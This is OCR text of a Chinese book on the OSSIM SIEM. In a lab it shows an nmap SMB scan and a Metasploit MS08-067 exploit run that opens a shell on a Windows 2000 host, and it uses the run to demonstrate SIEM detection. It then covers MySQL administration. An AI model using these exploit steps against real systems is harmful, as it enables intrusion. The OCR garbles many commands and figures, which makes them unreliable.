Terminal X Terminal 


1243 exploits - 756 auxiliary - 208 post 
-[ 324 payloads - 32 encoders - 8 nops 


nsf > namp -PO --script-smb-check-vulns 192.168.11.99 

1-] Unknown command: namp. 

as > 

I*] exec: nmap -PO --script-smb-check-vulns 192.168.11.99 


Starting Nmap 6.40 ( http://nmap.org ) at 2014-03-30 20:4l CST 
Nmap scan report for 192.168.11.99 
Host is up (0.00028s latency). 

Not shown: 978 closed ports 

PORT — STATE SERVICE 

25/tcp open smtp 

S3/tcp open domain 

BO/tcp open http 

88/tcp open kerberos-sec 
135/tcp open msrpc 

139/tcp open netbios-ssn 

389/tcp open ldap 

445/tcp open microsoft-ds 
464/tcp open kpasswds 

593/tcp open http-rpc-epmap 
636/tcp open ldapssl 

lO26/tcp open LSA-or-nterm 
1029/tcp open ms-lsa 

lO39/tcp open sbl 

1048/tcp open neod2 

lo52/tcp open ddt 

lo54/tcp open brvread 

1061/tcp open kiosk 

1062/tcp open veracity 

3268/tcp open globalcatLDAP 
3269/tcp open globalcatLDAPssl 
3372/tcp open msdtc 

MAC Address: 00:0C:29:47:89:FB (VMware) 


Host script results: 

| smb-check-vulns: 

| Ms08-067: CHECK DISABLED (add '--script-args-unsafezl' to run) 
| Conficker: Likely CLEAN 

|  regsvc DoS: CHECK DISABLED (add '--script-args-unsafe-l' to run) 

| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args-unsafe-l' to r 
un) 

|  MSO6-025: CHECK DISABLED (add '--script-argscunsafezl' to run 

|. MS07-029: CHECK DISABLED (add '--script-args-unsafe-l' to run) 

Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds 


Ej [B Temna | 人 AienvautossM 


2.451 控制 台 下 扫描 


查看 详细 信息 ， 执 行 “info windows/smb/ms08 067_netapi” 命 令 ， 接 下 来 执行 “use 
windows/smb/ms08_067_netapi” 命 令 ， 进 入 到 渗透 攻击 模块 之 中 ， 再 执行 “show payloads” 命 
令 查 看 该 模块 可 以 使 用 的 攻击 载荷 。 在 攻击 载荷 中 选择 reverse tcp. 模块 ， 执 行 “set payload 
windows/meterpreter/reverse_tcp” 命 令 将 其 配置 到 渗透 模块 之 中 。 

该 载荷 的 作用 是 在 渗透 攻击 成 功 后 ， 执 行 “reverse_tcp” 模 块 中 的 Shellcode， 利 用 这 个 
Shellcode， 创 建 一 个 反 向 链接 的 会 话 。 当 选 配置 好 载荷 参数 后 ， 执 行 “show options” 命 令 来 
查看 需要 配置 的 目标 参数 ,在 ms08 067 netapi 模块 中 ,需要 设置 RHOST 参数 为 目标 靶 机 IP 
地 址 ,但 RPORT 参数 、LPORT 参数 以 及 target 参数 都 可 以 使 用 默认 值 。 渗 透 成 功 的 界面 如 
图 2-152 所 示 。 
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RHOST => 192.168.11.99 


RPORT => 445 


Started bind handler 


C: WINNTVsysten32:l 


维 平台 一 一 OSSIM 最 佳 实 


msf > use msf > info windows/smb/ms08_067_netapi 

[-] Failed to load module: msf 

msf > use windows/smb/ms08_067_netapi 

msf exploit(ms08 067 netapi) > set RHOST 192.168.11.99 


msf exploit(msO8 067 netapi) > set RPORT 445 


msf exploit(ms08 067 netapi) > set PAYLOAD generic/shell bind tcp 
PAYLOAD => generic/shell bind tcp 
msf exploit(msO8 067 netapi) > exploit 


I 

[*] Automatically detecting the target... 

[*] Fingerprint: windows 2000 - Service Pack 4 with MSOS-OlO* - lang:Chinese - Traditional 

[*] Selected Target: windows 2000 Universal 

[+] Attempting to trigger the vulnerability. 

[*] Command shell session 1 opened (192.168.11.27:49006 -> 192.168.11.99:4444) at 2014-03-30 22:36:59 +0800 


Microsoft Windows 2000 [Version 5.00.2195] 
(c) 669066 1985-2000 Microsoft Corp. 


© A Terminal. | @ Aienvauk ossiM ] 


图 2-152 ”渗透 成 功 


如 果 攻 击 者 采用 这 类 渗透 攻击 ， 那 么 在 OSSIM 监视 下 将 立刻 报警 ， 这 时 我 们 查看 SIEM 
事件 ， 就 能 发 现 报警 ， 如 图 2-153 所 示 。 并 能 查看 到 渗透 攻击 的 时 间 线 ， 如 图 2-154 所 示 。 
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A E REAP Sade Overflow rbound- MSO aer ti" 


J0 加 四 加 本 on Freptorrwioosoftwndow 
NETAPI Stack Overflow Irbourd- MSO-067(157 


CDAIGMISUDA SENSOR SOURCE 
20143330223657 kocelhost — 192368112750005 
2004233023657. localhost — 1923681275000 
2004330223657. localhost — 1323681127500 
2014233023657. localhost — 1923811275000 
3013330223657 localhost — 132168112750005 
20149330223657 lcalhos — 1923681275000 


DESTIN DON 


1921031945 


19119313945 


19219315945 


19119313945 


19216830945 


1921681199445 


à 


SEARCH CRITERIA cuan G 
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Me 
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2-153 查看 SIEM 报警 
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图 2-154 ”查看 渗透 攻击 时 间 线 
查看 某 条 事件 的 详细 信息 ， 如 图 2-155 所 示 。 
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2-155 ”查看 某 条 渗透 攻击 事件 
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这 里 Snort 系统 可 以 保存 恶意 流量 对 应 的 有 效 载荷 ， 通 过 单 击 “Download in pcap format" 
按钮 下 载 成 pcap 包 ， 以 便 再 利用 其 他 工具 进行 分 析 ， 例 如 CapAnalysis。 为 了 节省 篇 幅 大 家 可 
以 访问 作者 的 博文 : http:/chenguang.blog.51cto.com/350944/1325742/， 有 关 漏洞 分 析 检 测 的 内 
容 详 见 第 9 章 。 
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本 章 从 OSSIM 安装 策略 讲 起 ， 逐 步 讲 解 OSSIM 安装 前 的 各 项 准备 工作 ， 对 于 OSSIM 
USM 和 Sensor 之 前 的 区 别 以 及 商业 版 和 开源 版 之 间 的 区 别 进行 了 对 比 ， 在 物理 服务 器 和 虚拟 
机 的 安装 方法 也 进行 了 介绍 ， 详 细 介 绍 了 OSSIM 混合 模式 安装 ， 以 及 分 布 式 安装 的 方法 ， 对 
安装 之 后 必须 要 做 的 几 件 事 也 做 了 详细 阅 述 ， 最 后 详细 分 析 了 SIEM 系统 控制 台 的 使 用 技巧 ， 
这 对 于 分 析 OSSIM 事件 和 日 志 有 着 非常 重要 的 帮助 作用 。 

看 完 这 些 内 容 ， 了 解 了 高 大 上 的 图 表 之 后 ，OSSIM 系统 本 身 是 否 能 解决 企业 面临 的 安全 
问题 呢 ? 如 果 仅 生成 一 堆 的 统计 图 表 的 肯定 不 能 算 真 正 意义 上 SIEM， 要 用 好 OSSIM 系统 还 
需要 结合 企业 自身 的 安全 团队 使 用 ， 这 才 是 一 个 整合 资源 与 流程 的 自动 化 处 理 中 心 ， 部 署 
OSSIM 前 先 有 一 个 安全 团队 、 一 定 的 资产 信息 、 有 一 套 的 信息 安全 管理 流程 和 安全 事件 处 理 
流程 ， 部 署 OSSIM 系统 不 是 像 防火 墙 、 防 毒 软件 那样 ， 买 来 即 用 ， 更 多 的 工作 是 需要 企业 安 
全 团队 的 软 实 力 参与 。 


P" 
Open Source Security 
y Information Manageme 


gc 


第 3 章 
< OSSIM 数 据 库 概 述 > 


从 本 章节 可 以 学 习 到 : 
@ 访问 OSSIM 数据 库 (本 地 、 远 程 ) 
€ OSSIM 数据 库 结构 
@ OSSIM 中 的 MySQL 常见 操作 
€ ”OSSIM 系统 迁移 
€  OSSIM 常见 数据 库 问题 解答 
事件 关联 是 整个 OSSIM 关联 分 析 的 核心 OSSIM 的 事件 关联 需要 海量 处 理 能 力 ， 主 要 体 
现在 需要 及 时 存储 从 设备 采集 到 的 日 志 ， 并 能 关联 匹配 和 输出 ， 进 而 通过 Web UI 展示 。 从 实 
时 性 上 看 ， 关 联 分 析 的 整个 处 理 过 程 不 能 间断 ， 这 对 系统 的 实时 性 要 求 较 高 ， 另 外 OSSIM 系 
统 是 基于 规则 的 ，OSSIM 内 部 具有 多 套 高 速 规则 分 析 引 擎 ， 以 实现 模式 匹配 和 对 关联 分 析 结 
果 调 用 。 所 以 系统 的 关联 引擎 是 一 个 典型 数据 处 理 系统 ， 必 须 依 靠 强大 的 数据 库 做 支撑 。 EFF 
ii OSSIM 系统 中 ， 就 采用 了 基于 MySQL 5.6 的 数据 库 ， 其 商业 版 采用 MonogDB。 

普通 日 志 存 入 数据 库 较 容 易 ， 但 如 果 是 关联 引擎 , 将 告警 存 入 数据 库 的 过 程 要 复杂 , 到底 
它 的 压力 在 哪儿 ?例如 一 个 关联 规则 需要 在 1 秒 钟 内 , 通过 SQL 语句 获取 10 条 数据 ,那么 关 
联 引擎 就 需要 在 1 秒 钟 内 进行 10 次 磁盘 存 取 , 这 个 要 求 就 比 普通 日 志 存 入 数据 库 高 ,而 OSSIM 
数据 库 中 的 表 、 字 段 、 索 引 都 为 了 这 种 事务 处 理 做 了 特殊 设置 ， 具 有 一 次 写 多 次 读 的 特性 。 对 
于 复杂 模式 的 匹配 非常 有 有 用。 例如， 筛选 出 1 分 钟 内 SSH 登录 服务 器 ， 失 败 次 数 超过 5 次 的 
源 IP 地 址 ， 关 联 分 析 引 擎 将 定时 进行 SQL 访问 ， 找 到 某 个 符合 要 求 的 事件 记录 。 另 外 ， 本 章 
介绍 的 数据 库 知 识 相对 容易 、 无 须 专业 , 下面 开始 介绍 OSSIM 数据 库 结 构 、 监 控 及 备份 方法 。 


OSSIM 数据 库 组 成 


3.1.1 MySQL 
OSSIM 融合 了 传统 和 现代 数据 库 技术 ， 即 SQL AI NoSQL, 第 1 章 还 介绍 过 OSSIM 使 用 
Redis 作为 消息 队列 服务 器 ，Redis 属于 NoSQL 数据 库 ， 在 商业 版 OSSIM 中 还 使 用 了 
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MonogoDB。 下 面 我 们 先 看 看 OSSIM 下 主要 数据 库 MySQL 结构 。 

OSSIM 4.8 在 安装 最 后 阶段 系统 会 产生 information schema, ISO27001An PCI, alienvault, 
alienvault api, alienvault asec alienvault siem 、avcenter categorization, datawarehouse 、 
myadmin、mysql、ocsweb 和 performance schema 在 内 的 14 个 数据 库 。 


Datawarehouse: 存储 OTX ( Open Threat Exchang ) ,记录 公开 成 胁 交 换 的 相关 数据 。 
Ocsweb: 存储 Ocs 信息 , 更 多 Ocs 内 容 参 见 我 的 博客 《Ocs Inventory NG 使 用 》 一 文 。 
Alienvault: 存储 SIEM 信息 。 

Alienvault api: 存储 alienvault 应 用 程序 接口 信息 。 

Alienvault_siem: 存储 事件 信息 。 

avcenter: Alienvault 中 心 数据 库 ， 存 放 着 管理 和 开发 组 件 和 OSSIM UI 信息 。 
ocsweb: 在 OSSIM 系统 中 使 用 了 开源 IT 资产 管理 系统 (Open Computer System 
Inventory ) 这 个 数据 库 中 存放 着 服务 器 资产 数据 。 


OSSIM 2.x 3.x、4.0、4.1、4.2 使 用 的 数据 库 种 类 如 下 所 示 : 


information schema , IS027001An , PCI , categorization , datawarehouse , 
jasperserver , myadmin, mysql, ocsweb、 ossim , ossim acl, osvdb , snort. 


访问 OSSIM 数据 库 分 两 种 情况 : 一 种 是 本 地 访问 ， 一 种 是 远程 访问 。 


3.1.2 ”本 地 访问 
在 OSSIM 控制 台 下 连接 MySQL， 除 了 传统 的 命令 访问 ， 还 可 以 通过 ossim-db 命令 访问 。 
#ossim-db 
当然 也 可 以 通过 下 面 传统 的 命令 访问 : 
#mysql -u root -p 
在 输入 口令 后 即 可 连接 ， 下 面 是 几 个 常见 命令 : 


>SHOW DATABASES; 查看 数据 库 ; 

>USE 数据 库 名 ; 更 改 默 认 使 用 的 数据 库 ; 

>SHOW TABLES; 查看 数据 库 中 的 表 ; 

>SHOW TABLES;pager more; 如 果 表 太 长 ， 一 屏 无 法 显示 就 需要 分 屏 显示 ; 
分 屏 显 示 方 法 为 : 


>pager less; 
>show tables; 


>DESC 表 名 ; 查看 表 结 构 ; 

>SHOW COLUMNS FROM «table name»; ” 列 出 表 的 列 信息 
>SHOW INDEX FROM «table name» ; 列 出 表 索 引信 息 
»SHOW STATUS; 列 出 server 状态 信息 
>SHOW PROCESSLIST; 查看 当前 MySQL 进程 
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show processlist 命令 非常 实用 ， 有 时 候 MySQL 经 常 达到 50% 以 上 或 更 多 ， 就 需要 用 这 个 
命令 看 哪个 SQL 语句 占用 CPU 资源 较 多 。 如 图 3-1 所 示 。 


图 3-1 查看 进程 


上 图 中 各 列 含义 如 下 : 


id: 代表 标识 ，Kill 一 个 语句 时 用 到 ; 

user: 显示 当前 用 户 。 如 果 是 非 root 用 户 ， 该 命令 就 只 显示 你 权限 范围 内 的 SQL 语句 ; 
host: 显示 这 个 语句 是 从 哪个 中 地 址 和 端口 发 出 ， 可 用 来 追踪 出 问题 语句 的 用 户 ; 
db: 显示 这 个 进程 目前 连接 的 是 哪个 数据 库 ; 

command: 显示 当前 连接 的 执行 的 命令 ， 分 为 休眠 (sleep) 、 查 询 (query) 、 连 接 
(connect ) ; 

time: 该 状态 持续 的 时 间 ， 单 位 是 秒 ; 

state: 显示 使 用 当前 连接 的 SQL 语句 T state 只 是 语句 执行 中 的 某 一 个 状态 ， 
一 个 SQL 语 和 句 , 已 查询 为 便 可 能 需要 经 过 copying to tmp table Sorting result Sending 
data 等 状态 才 可 以 完 

info: 显示 这 个 SQL 语 84. 因为 长 度 有 限 ， 所 以 长 的 SQL 语句 就 不 全 ， 但 仍然 
是 一 个 判断 问题 语句 的 重要 依据 。 


#mysqladmin -i10 processlist extended-status 监控 MySOL 的 状态 
#mysqldump -u root --password-XXXXXXXX --all-database »/backup/backup.sql 备 
份 所 有 数据 库 


查看 OSSIM 数据 库 大 小 ， 在 MySQL 中 由 于 information_schema 存放 了 其 他 的 数据 库 的 
信息 ， 我 们 只 要 查询 其 中 相应 信息 就 可 得 知 数据 库 的 大 小 。 


(1) 指定 information schema 数据 库 。 


>use information schema 


(2) 查询 所 有 表 中 数据 的 大 小 。 
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>select concat (round (sum (DATA LENGTH/1024/1024),2),"MB") as data from TABLES; 


(3) 查看 指定 数据 库 的 大 小 ， 比 如 说 数据 库 alienvault。 


>select concat (round (sum (DATA LENGTH/1024/1024),2),"MB") as data from TABLES 
where table schema-"alienvault"; 


(4) 查看 指定 数据 库 的 表 的 大 小 ， 例 如 数据 库 alienvault 中 alarm 表 。 

>select concat (round (sum (DATA LENGTH/1024/1024),2),"MB") as data from TABLES 
where table schema-"alienvault" and table name-"alarm"; 

还 需 注意 ， 所 有 数据 库 文件 默认 放置 在 /var/lib/mysql 目录 下 ， 其 中 alienvault, osvdb 这 两 
个 数据 库 最 大 ， 其 容量 总 共 600MB 。 


3.1.3 AE, Ax 

有 关 OSSIM 主要 数据 库 及 表 结构 ， 请 读者 访问 http://chenguang.blog.51cto.com/350944/ 
1699995, 这 里 重点 讲解 OSSIM 系统 中 几 个 重要 的 表 : alienvault.alarm 表 、alienvault.event 表 、 
alienvault siem.acid event 表 ,它们 存储 的 数据 非常 多 ， 而 且 读 写 频繁 , 如 果 MySQL 进程 在 写 
入 中 被 Kil， 或 者 系统 意外 关闭 都 有 可 能 造成 表 损坏 。MySQL 提供 了 检查 表 、 分 析 表 和 优化 
表 的 语句 。 


#ossim-db 

mysql>USE alienvault /* 打 开 alienvault 库 */ 

mysql» CHECK TABLE alarm,event; /* ifr alarm 和 event 是 否 存在 错误 */ 

mysql»ANALYZE TABLE alarm; /* 分 析 表 alarm， 分 析 表 期 间 不 能 更 新 和 插入 记录 ， 
多 个 表 之 间 用 逗号 分 隔 */ 

mysql>USE alienvault siem /*1]Jf alienvault sime*/ 

mysql»CHECK TABLE acid event; /* 检 查 表 acid event 是 否 存在 错误 */ 


mysql»OPTIMIZE TABLE acid event; /* 优 化 表 acid event*/ 


下 面 的 结果 是 - 个 发 现 写 写 错误 的 实例 : 


note 
error 


alienvault_siem acid_event Table does not support optimize, doing recreate * analyze instead 
alienvault siem. acid event Error writing file "./alienvault siem/fsql-6d9 209fT.frm (Errcode: 28) 
alienvault siem acid event | optimize | status Üperation failed 

+ 一 一 一 一 - -— 十 


mysql»OPTIMIZE TABLE extra.data; /* 优 化 表 extra.data*/ 


Eee 


alienvault siem extra data 
alienvault siem extra data 
alienvault siem extra data 


optimize 
optimize 
optimize 


note Table does not support optimize, doing recreate * analyze instead 
error Error writing file './alienvault siem/fsql-6d9 209fT.frm (Errcode: 28) 
status Üperation failed 

一 


3 rows in set, 1 warning (0.05 sec) 


并 非 所 有 优化 都 能 见效 优化 表 有 时 还 会 起 到 反作用 , 笔者 曾 遇 到 一 套 出 现 故障 的 OSSIM 
系统 ， 该 系统 负载 非常 高 ， 只 要 做 一 点 查询 任务 ， 系 统 就 非常 卡 ， 处 于 一 种 假死 状态 ， 重 启 系 
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统 后 能 缓和 一 些 ， 而 过 不 了 多 久 系 统 就 重复 出 现 这 种 故障 ， 之 后 我 在 系统 中 发 现 event. 
acid event 表 非 常 庞大 ， 大 约 记 录 了 150millions 条 记录 ， 而 记录 它 的 数据 库 文件 
/var/lib/mysql/alienvault_siem/acid_event.idb 和 /var/lib/mysql/alienvault_siem/extra_date.idb， 其 容 
量 分 别 达到 了 70GB 和 149GB。 更 让 我 意外 的 是 ， 在 计划 任务 列表 中 发 现 系 统 每 天 对 一 些 大 
型 表 进行 优化 ， 要 知道 在 这 种 规模 的 数据 库 中 进行 表 优 化 ，MySQL 会 通过 Optimizer 模块 ， 
根据 该 SQL 所 涉及 数据 表 的 相关 统计 信息 进行 计算 分 析 ， 然 后 再 得 出 最 合理 最 优化 的 数据 访 
问 方式 ， 尤 其 是 OSSIM 经 常 需要 多 表 联 合 查询 ， 所 以 消耗 了 大 量 CPU。 因 此 ,在 SIEM 事件 
量 膨胀 过 快 的 实例 中 ， 可 以 将 “Active Event Windows(dayes)” 的 值 缩短 为 5 天。 


3.1.4 启用 MySQL 慢 查询 记录 

上 线 的 OSSIM 系统 事件 量 非常 庞大 ， 有 时 为 了 过 滤 一 些 敏感 字段 , 往往 查询 时 间 比 较 长 , 为 
了 在 OSSIM 数据 库 中 找 出 这 些 查 询 较 慢 的 SQL 查询 (执行 时 间 较 长 )， 我 们 需要 更 深入 分 析 
OSSIM。MySQL 为 我 们 提供 了 Slow Query Log 记录 功能 , 它 能 记录 执行 时 间 超 过 了 特定 时 长 ( 默 
认 2 秒 ) 的 查询 。 分 析 Slow Query Log 有 助 于 帮 我 们 找到 “问题 ”查询 。 操 作 方 法 如 下 : 

#vi /etc/mysql/my.cnf 

找到 #Logging and Replication# 确 保 下 面 三 条 语句 没有 被 注释 掉 〈 前 面 没有 # 号 )。 

€ log-slow_ queries=/var/log/mysql/mysql-slow.log. 

€ long query time=5 /* 超 过 5 秒 的 查询 将 会 被 记录 */。 

€  log-queries-not-using-indexes /* 没 有 使 用 索引 的 查询 记录 到 slow query 日 志 */。 


总 之 ， 在 分 析 OSSIM 系统 时 ， 建 议 开启 慢 查 询 记录 ， 在 Web UI 中 查询 各 种 事件 观察 图 
表 变 化 ， 同 时 通 tail 来 观察 mysql-slow.log 变化 ， 有 利于 让 你 搞 清楚 OSSIM 中 “ 花 销 最 大 ”的 
SQL 查询 。 而 对 于 正式 上 线 系统 ， 则 建议 关闭 该 功能 。 下 面 介 绍 两 款 常 用 慢 查 询 工具 。 

MySQL 官方 工具 mysqldumpslow， 该 工具 主要 包括 了 统计 不 同 慢 查 询 的 出 现 次 数 ， 消 耗 
时 间 和 扫描 行 数 等 ， 操 作 方法 如 下 : 

#mysqldumpslow -s c -t 20 /var/log/mysql/mysql-slow.log 


€ -s 表示 排序 。 
€ c: 表示 计数 。 
e -t20: 表示 显示 前 20 条 。 


另 一 款 好 用 工具 是 mysqlsla， 它 输出 的 数据 报表 有 利于 分 析 慢 查询 的 原因 ， 包 括 执行 频 
率 、 数 据 量 、 查 询 消耗 等 。 该 工具 可 以 到 作者 博客 下 载 mysqlsla-2.03.tar.gz， 解 压 到 目录 ， 进 
入 目录 后 ， 检 查 包 依赖 关系 。 


# perl Makefile.PL 
Checking if your kit is complete... 
Looks good 
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Writing Makefile for mysqlsla 


看 到 上 面 提示 说 明 可 以 继续 安装 ， 下 面 开 始 编译 ， 安 装 过 程 。 


# make && make install 


简单 使 用 : 


# mysqlsla -lt slow /var/log/mysql/mysql-slow.log 


3.1.5 “远程 访问 

由 于 安全 需要 ， 默 认 情 况 下 我 们 只 能 在 控制 台 上 登录 后 对 MySQL 进行 操作 ， 但 实际 工作 中 
常常 需要 远程 对 数据 库 操 作 ， 除 了 通过 phpAdmin、Webmin、MySQL-Front Cwww.mysglfront.de ) 
工具 外 还 可 以 进行 以 下 操作 ， 以 实现 远 端 访问 MySQL 数据 库 〈 在 OSSIM 中 root 依然 是 MySQL 
的 默认 用 户 名 ，password 的 值 可 以 在 /ete/ossinyossim_setup.conf 中 找到 )。 

(1) 编辑 /etc/ossim/ossim_setup.conf 文件 。 

此 文件 中 有 一 个 参数 db_ip， 默 认为 127.0.0.1， 不 建议 修改 。 


(2) 修改 root 的 权限 。 
通常 在 MySQL 的 安装 文件 中 包含 MySQL 系统 库 ， 其 中 user 表 ， 使 用 usemame 与 host 做 双 
主键 ， 如 果 这 张 表 中 没有 root, localhost 这 一 行 字段 ， 那 么 该 用 户 无 权限 登录 localhost。 如 果 这 个 
时 候 不 修改 权限 ， 例 如 客户 机 〈IP:192.168.150.200) 在 联机 数据 库 时 就 会 遇 到 如 下 问题 。 
Access denied for user 'root'8'192.168.150.200' (using password:YES) 


这 是 因为 当前 用 户 没有 访问 MySQL 的 权限 所 导致 的 ， 我 们 可 以 采用 如 下 办 法 修改 root 
权限 : 

mysql» grant 权限 1, 权限 2,… 权 限 n on 数据 库 名 . 表 名 to 用 户 名 @ 用 户 地 址 identified by 
' 连 接口 令 '; 

当 数 据 库 名 称 . 表 名 称 被 *.* 代 替 时 ， 表 示 赋 予 用 户 操作 服务 器 上 所 有 数据 库 、 所 有 表 的 权 
限 。 用 户 地 址 可 是 localhost， 也 可 是 Ip 地 址 、 机 器 名 字 或 域名 ， 还 可 以 用 “%” 表 示 从 任何 
地 址 连接 。 为 来 自 IP 地 址 为 192.168.150.200 的 root 用 户 分 配对 任何 数据 库 的 任何 表 进 行 所 有 
操作 的 权限 ， 语 句 如 下 。 


mysql»grant all privileges on *.* to 'root’@’192.168.150.200' with 
grant option; 

mysql»flush privileges; 

mysql»exit 


经 过 上 面 两 个 步骤 之 后 ， 就 可 以 在 其 他 主机 上 使 用 客户 端 工具 登录 MySQL 服务 器 。 如 遇 
到 拒绝 访问 提示 请 参照 本 书 5.6 节 问 题 6 方法 处 理 。 
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3.1.6 MongoDB 

在 OSSIM USM 中 采用 MongoDB 存储 资产 等 事件 ， 首 先是 因为 MongoDB 的 高 性 能 ， 只 
要 数据 量 控制 在 MongoDB 服务 器 物理 内 存 的 大 小 以 内 ， 其 插入 、 查 询 性 能 要 超过 传统 关系 型 
数据 库 不 少 。 在 OSSIM 系统 中 事件 分 析 和 日 志 收 集 分 析 是 典型 海量 数据 存储 高 并 发 的 事件 ， 
如 将 日 志 存放 在 DB， 这 可 能 使 数据 库 瘫痪 ，MongoDB 的 以 下 特点 ， 使 得 它 可 以 胜任 这 一 工 
作 需 求 : 
可 以 存 入 海量 数据 ; 
能 承受 高 并 发 ; 
可 以 使 用 廉价 存储 ; 
@。 单 服务 器 稳定 性 可 以 满足 要 求 。 


由 于 篇 幅 限 制 ， 有 关 OSSIM 系统 中 的 MongoDB 的 使 用 方法 ， 大 家 可 以 参见 我 的 博客 
http://chenguang.blog.5 Icto.com/. 


3.1.7 SQLite 

SQLite 是 一 个 开源 的 嵌入 式 关系 数据 库 ， 它 在 2000 年 由 D. Richard Hipp 发 布 ， 它 减少 了 
应 用 程序 管理 数据 的 开销 ，SQLite 可 移植 性 好 、 易 使 用 、 高 效 而 且 可 靠 。 在 OSSIM 中 由 于 需 
要 一 个 轻巧 、 高 效 的 数据 库 , 所 以 采用 了 SQLite3, 它 在 av. forward 和 Openvas 中 发 挥 着 作用 ， 
具体 数据 库 位 置 如 下 : 

av forward /var/ossim/av forward/avcache.db 


/var/lib/openvas/mgr/tasks.db 
/var/lib/openvas/scp-data/scap.db 


由 于 篇 幅 限 制 ， 有 关 OSSIM 系统 中 的 SQLite3 的 使 用 方法 ， 大 家 可 以 参见 博客 
http://chenguang.blog.5 1cto.com/。 


OSSIM 数据 库 分 析 工 具 


数据 库 服务 器 需要 四 项 基本 资源 : CPU、 内 存 、 硬 盘 和 网 络 。 如 果 这 四 项 资源 中 任何 一 项 
性 能 减弱 、 不 稳定 或 超 负载 工作 ， 可 能 导致 整个 OSSIM 服务 器 的 性 能 降低 ， 轻 则 导致 日 志 分 
析 无 法 达到 实时 性 ， 重 则 OSSIM 系统 宕 机 。 

为 了 确保 OSSIM 系统 核心 MySQL 服务 器 能 够 一 直 处 于 正常 运行 的 状态 ， 保 持 稳定 的 性 
能 ， 我 们 需要 通过 分 析 OSSIM 工作 负载 来 进一步 调整 数据 库 。 在 命令 行 方式 下 通过 “show 
processlist” 命 令 ， 可 以 查看 一 些 信息 ， 但 不 方便 ， 而 OSSIM 系统 本 身 提供 了 mytop 命令 行 分 
析 工 具 能 解决 这 个 难题 。 
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TEST 


mytop 结果 显示 类 似 于 top， 在 其 第 三 行 的 “Key Efficiency” 就 反映 出 缓存 命中 率 。 除 了 
这 个 命令 行 工具 以 外 ， 这 里 再 介绍 几 款 分 析 OSSIM 负载 的 工具 ， 通 过 图 形 化 的 查询 检测 工具 
一 一 MySQL Enterprise Monitor 查询 分 析 器 ， 该 工具 能 够 捕捉 服务 器 所 执行 的 查询 ， 以 降序 的 
方式 根据 响应 时 间 列 出 任务 列表 。 它 会 将 消耗 资源 最 多 的 任务 置顶， 这 样 能 够 引起 注意 。 大 家 
还 可 以 搭配 iotop 工具 监控 硬盘 VO 状况 H htop 监控 进程 状况 H“ iostat -d -x-k 1% “iostat -d 
10 6” 等 命令 监控 硬盘 IO 操作 等 ， 这 些 工具 都 是 OSSIM 系统 自 带 。 有 关 mytop 工具 在 第 5 
章 还 会 详细 讲解 。 


3.2.1 ”负载 模拟 方法 

这 里 引入 基准 测试 工具 sysbench. 〈 此 工具 在 OSSIM 系统 中 不 带 ， 可 以 通过 apt-get install 
sysbench 安装 ) 来 测试 OSSIM 数据 库 的 性 能 。 

sysbench 基本 测试 举例 如 下 : 


(1) 测试 CPU 的 性 能 

| #sysbench --test-cpu --cpu-max-prime-20000 run 00 
(2) 线程 测试 

| dsysbench --test-threads --num-threads-64 run ————— o 
G) 内 存 Cmemory) 测试 


(4) 文件 的 IO 测试 


sysbench OLTP 基准 使 用 OLTP 模拟 了 事务 处 理 的 负荷 。 我 们 展示 一 个 百 万 级 数据 表 的 例 


F: 
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Creating 1000000 records in table 'sbtest'... 


数据 准备 完毕 ， 接 着 运行 8 个 并 发 、60s 内 只 读 的 基准 测试 。 


#sysbench --test-oltp --oltp-table-size-1000000 --mysql-db-test 
--mysql-user-root --max-time-60 --oltp-read-only-on --max-requests-0 
--num-threads-8 run 


1 在 MySQL 网 站 上 有 多 款 不 错 的 、 适 合 OSSIM 系统 数据 库 性 能 监控 的 数据 库 ， 例 如 Mysql 
l Workbench 和 Mysql Enterprise Monitor 等 ， 网 址 为 http://www.mysql.com/downloads/ 


MySQL Workbench 是 可 视 化 数据 库 设计 、 监 控 管 理 ， 以 及 备份 的 工具 集 ， 它 分 为 开源 和 
商业 化 的 两 个 版 本 ， 目 前 最 新 版 本 6.4。 下 面 的 实验 是 在 Windows XP +SP3+.Net 4.0 环境 下 安 
装 Workbench， 其 运行 效果 如 图 3-2 所 示 。 


Server Status 
INFO SYSTEM SERVER HEALTH 


Load: Mem. Connection Usage: $9 — Trafic: 10.73 KB/s Query Cache Hitrate: 51.42% — Key Efficiency: 98.86% 
CONNECTIONS 
ld User Host ~ De Command Time State Irfo 
21162 root 192.168.150. 144:2224 None Sleep 487 None 
21163 root 192.168.150.144:2225 None Sleep 487 None 
21180 root 192.168.150,144:2229 alienvaut Sleep das None 
21181 root 192.168.150.144:2230 alienvaut Sleep 45 None 
21218 root 192.168.150. 144:2250 None Sleep 935 None 
21221 root 192.168.150.144:2252 None Sleep 917 None 
21262 root 192.168.150.144:2257 None Query 0 None SHOW FULL PROCESSLIST 
21263 root 192.168.150.144:2258 None Sleep 2 None 
17139 root 192.168.150.189:62647 None Sleep 3502 None < 
17535 root 192.168.150.210:53458 allenvaut Sleep 9 None 
17536 root 192.168.150.210:53459 alenvault Sleep 745 None 
17537 root 192.168.150.210:53460 allenvault. siem Sleep 83 None 
17538 root 192.168.150.210:53461 allenvaukt siem Sleep 949 None 
19629 root 192.168.150.212:59694 alienvaut Sleep 4902 None 
19631 root 192.168.150.212:59690 alienvaut Sleep 3686 None 
19636 root 192.168.150.212:59697 alenvauk. Sleep 222 None 
19537 root 192.168.150.212:59698 alienvaut Sleep 118 None 
19639 root 192.168.150.212:59700 alienvaut Sleep 7 None 
19640 root 192.168.150.212:59701 alienvaut Sleep 118 None 
19643 root 192.168.150.212:59704 alienvaut Sleep 4897 None 
19645 root 168.150.212: alienvaut Sleep 376 None 
19647 root 168.150. alienvaut Sleep 28 None 
19653 root 168. alenvaut Sleep 4365 None 
aai ama seo si " par pus aem Mx al 


Reese MEE S] Kier | Connection | _Copy Selected | _ Refresh | 
图 3-2 监控 OSSIM 系统 各 数据 库 状 况 


通过 这 款 工具 可 以 方便 地 将 OSSIM 数据 库 备份 到 异地 服务 器 , 而 无 须 停止 MySQL 服务 ， 
从 而 保证 了 系统 连续 性 ， 其 备份 过 程 如 图 3-3 所 示 。 
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Data Export 
Object Selection | advanced Options | Export Progress | 


[Shems Obeas 


P" 


(€. Export to Dump Project Folder 


Data port. 
Object Selecton | advanced Optons Export Progress | 
Export i running 
I 
Status: 

135 255 exported. 

tog: 


"slenvait "policy host group reference" 


TEZE Duero dead dn ésard vig conh 
zr 

exe -dof mits-extra- files "c Adocume--1|admine«1Uocals-: 1 itemplitmoms. 
| hoste 192.168. 150.20 —porte3306 —def st-character-seteutf "alenvauk" "dashboard. dor 
